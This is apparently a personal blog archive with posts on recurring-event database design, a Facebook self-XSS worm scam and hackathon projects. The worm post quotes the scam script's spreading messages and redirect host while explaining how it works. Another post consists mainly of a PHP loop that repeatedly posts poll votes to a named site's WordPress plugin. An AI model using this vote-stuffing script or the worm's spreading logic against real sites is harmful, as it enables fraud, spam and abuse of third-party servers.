Category Archives: Blog

Storing recurring events in a database

One problem that seems to affect many web developers (and desktop programmers as well) is how to store recurring events in a database. There are several ways to do this, all with varying degrees of complexity (both inserting and selecting), storage requirements, and requirements on the type of recurrences. These can all be found by googling, and most are language agnostic in their implementations.  In my case, I needed to store events that could have a very complex set of requirements. Some examples:

  • Weekly on Thursday and Friday forever
  • Once a month on Friday for 6 months
  • Every other Friday
  • Every third Friday of the month

Also, it needed to be able to handle exceptions and extensions to existing recurring events, and the events could not be purely virtualized instances, since other objects would references event id numbers as a way of collating data collected. After all this, a set of three tables seems appropriate, with Event, EventModel, and EventException objects.  Each Event is an instantized version of EventModel, and once instantized will remain forever in the database.  While this is not best practice, negative infinity in our case is relatively manageable for now.  In the future, implicit grouping of data according to a index-less key may be used.  EventModel, which contains all the attributes of a single event, plus meta data relating to recurrences acts as a prototype event for recurring events.  To normalize the data a bit, even non-recurring events will be stored as EventModels.  This will aid in data manipulation later.  The EventException object belongs to a third table, which stores individual event exceptions.

In practice, a daily cron script will create events for that day based upon the rules in EventModels.

When viewing events, the easiest way is to view EventModels, with sub-grouping of recent and upcoming events associated with that EventModel.

 

Of course, I’m not an actual programmer or computer scientist, so suggestions are welcome.

Facebook XSS Hacks

Everyone remembers back when you had AOL Instant Messenger, a major threat was getting a virus. Once a friend got one, it would send itself as a chat message to all of their friends, propagating across the network.

Now, there seems to be a similar menace facing Facebook, especially it’s chat feature. I recently received a message from a friend on Facebook with the text: “Sam See who views your profile @ x.co/WkdW?95031”. Upon visiting my newsfeed, I noticed a new event invitation to “How to see who viewed your profile!!” by the same person. Interested to see how this was spreading, I visited the link provided (in a secure browser of course). Looking at the site, apparently you are supposed to paste in a JavaScript file into your address bar, which executes and tells you who views your profile. While this is of course impossible, it was interesting to see what exactly was going on. Opening the JavaScript file, I discovered a bunch of code I can’t claim to understand.  However, some was kind of simple, and I shall attempt to explain it.

var randomnumber=Math.floor(Math.random()*99999);
var chatmessage = '%firstname% See who views your profile @ x.co/WkdW?'+randomnumber;
var postmessage = 'My Top Profile Viewers: \n\ %tf% - 1136 views \n\ %tf% - 983 views \n\ %tf% - 542 views \n\ %tf% - 300 views \n\ See who views your profile @ http://x.co/WkdW?'+randomnumber;
var redirect = 'http://aafv8vni.info/final.php';
var eventdesc = 'Hey everyone, \n\ fb now lets you see who viewed your profile! to enable this feature, go here! - http://x.co/WkdW?'+randomnumber;
var eventname = 'How to see who viewed your profile!!';

This first part was very simple.  Apparently it just creates a random link, and spreads it three ways: chat messages, wall posts, and events.  The event creation is something I haven’t seen before and was kind of interesting.  Also, for those interested, the values provided are hard-coded into the script, which means they are completely fake.  This was assumed, but it’s nice to know for sure.  I’m not sure what the random number is for, maybe the author is doing some cool social network analysis on people who click on links like this.  The redirect goes to a pages that links to several surveys that allow them to “verify your identity.”  This is probably just more ways to spam you and make money.

The rest of the code is very obfuscated due to variable and function naming.  Some parts to note are that the author left debug functions intact and uses unique URL identifiers for each instance.  I’m not sure if this is for tracking purposes, but it could open some cool doors for network mapping of gullible people.  The funny thing is that it doesn’t actually harm your computer (that I know of), and only tries to spread itself.  This could just be the beginning of something bigger, but for right now the worst part is the embarrassment and cleanup of your Facebook profile.  The code itself is not very intriguing, since XSS is a commonly known information security vulnerability affecting many sites on the internet.  However, since the script relies on a victim actually pasting code into the URL bar once they are on Facebook, this scam is easy to avoid.

Full Code

Why you shouldn’t use vulnerable software

Because this might happen.
And then this.

<?php
while(1){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://34st.com/wp-content/plugins/wp-polls/wp-polls.php");
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$id=rand(11,13);
curl_setopt($ch, CURLOPT_POSTFIELDS,"vote=true&poll_id=3&poll_3=$id");
curl_exec($ch);
curl_close($ch);
header('Location: http://getmeep.com/curl.php?loop=true');
}
?>

MEEPME at Blarney

Aside from some technical glitches and miscommunication, tonight went pretty well for MEEPME.  Almost a hundred people signed up, and everyone seemed to have a fun time playing around with it.  We got to demo our new AJAXified text feed, and other than a screensaver problem and a video cable problem, it worked great all night.  We could even update the page in real time since the AJAX reloaded the contents every .5 seconds.  I have no idea how much load this was actually putting on the server, but hopefully this should hold together until the next major revision.  The first priority is now to finish the admin backend.

PennApps in Summary

Wow, what a trip.  When Matt contacted me a week before the competition to ask if I had a team yet, I had no idea we would get this far.

Timeline

  • Thursday, before competition – Meet up with Matt, go over idea, get introduced to Twilio API
  • Friday, 6pm – Watch intros, get theme, meet the team (Fred and Vincent), then leave to go DJ
  • Saturday, 10am – arrive to start coding, hungover.
  • Saturday, 1pm – basic ideas and framework fleshed out
  • Saturday, 10pm – so many bugs!
  • Saturday, midnight – start website component
  • Sunday, 4am – mostly done, still fixing bugs
  • Sunday, 10am – nap on hammock
  • Sunday, noon – demo to judges individually
  • Sunday, 2pm – demo for 2.5 minutes in front of audience
  • Sunday, 4pm – MEEPME announced as Grand Prize winner!
  • Monday, 4pm – start social media blitz for Student Choice Award
  • Following Monday, 12:15am – MEEPME wins Student Choice Award!

Next stop: Wharton Business Plan Competition and Philly Startup Weekend!

Media

httpv://www.youtube.com/watch?v=nnyaOXn_HY4
httpv://www.youtube.com/watch?v=W4DGTf0fvRQ